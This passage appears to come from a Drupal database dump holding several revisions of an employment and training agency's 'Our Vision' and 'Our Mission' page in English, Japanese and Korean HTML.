Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 284, 'en', 0, '<img data-entity-uuid=\"eb1819b4-b6f8-4bed-8ab0-49e296d0329e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602.png\" width=\"100%\" data-align=\"center\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 284, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_0.png\" data-align=\"left\" data-entity-uuid=\"0139e778-f800-4211-bab2-241a3161a010\" data-entity-type=\"file\" width=\"30.5%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902.png\" data-align=\"left\" data-entity-uuid=\"3b9565a8-e5ea-426b-927b-4ef6b8f0deb1\" data-entity-type=\"file\" width=\"30.39%\"><p class=\"MsoNormal\"><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 284, 'ko', 0, '<img data-entity-uuid=\"e07c5eba-fca1-4d18-83b7-a8aa8d8b75ed\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602_1.png\" width=\"100%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 285, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_1.png\" data-align=\"left\" data-entity-uuid=\"86bda383-6d52-4363-8c1e-a41e045b7dcd\" data-entity-type=\"file\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902_0.png\" data-align=\"left\" data-entity-uuid=\"30569f4b-43d5-4996-906b-fbe307bd34e2\" data-entity-type=\"file\" width=\"29.72%\"><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 285, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_0.png\" data-align=\"left\" data-entity-uuid=\"0139e778-f800-4211-bab2-241a3161a010\" data-entity-type=\"file\" width=\"30.5%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902.png\" data-align=\"left\" data-entity-uuid=\"3b9565a8-e5ea-426b-927b-4ef6b8f0deb1\" data-entity-type=\"file\" width=\"30.39%\"><p class=\"MsoNormal\"><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 285, 'ko', 0, '<img data-entity-uuid=\"e07c5eba-fca1-4d18-83b7-a8aa8d8b75ed\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602_1.png\" width=\"100%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 286, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_1.png\" data-align=\"left\" data-entity-uuid=\"86bda383-6d52-4363-8c1e-a41e045b7dcd\" data-entity-type=\"file\" width=\"30.62%\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902_0.png\" data-align=\"left\" data-entity-uuid=\"30569f4b-43d5-4996-906b-fbe307bd34e2\" data-entity-type=\"file\" width=\"29.72%\"><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 286, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_0.png\" data-align=\"left\" data-entity-uuid=\"0139e778-f800-4211-bab2-241a3161a010\" data-entity-type=\"file\" width=\"30.5%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902.png\" data-align=\"left\" data-entity-uuid=\"3b9565a8-e5ea-426b-927b-4ef6b8f0deb1\" data-entity-type=\"file\" width=\"30.39%\"><p class=\"MsoNormal\"><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 286, 'ko', 0, '<img data-entity-uuid=\"e07c5eba-fca1-4d18-83b7-a8aa8d8b75ed\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602_1.png\" width=\"100%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 287, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_1.png\" data-align=\"left\" data-entity-uuid=\"86bda383-6d52-4363-8c1e-a41e045b7dcd\" data-entity-type=\"file\" width=\"30.62%\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902_0.png\" data-align=\"left\" data-entity-uuid=\"30569f4b-43d5-4996-906b-fbe307bd34e2\" data-entity-type=\"file\" width=\"29.72%\"><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
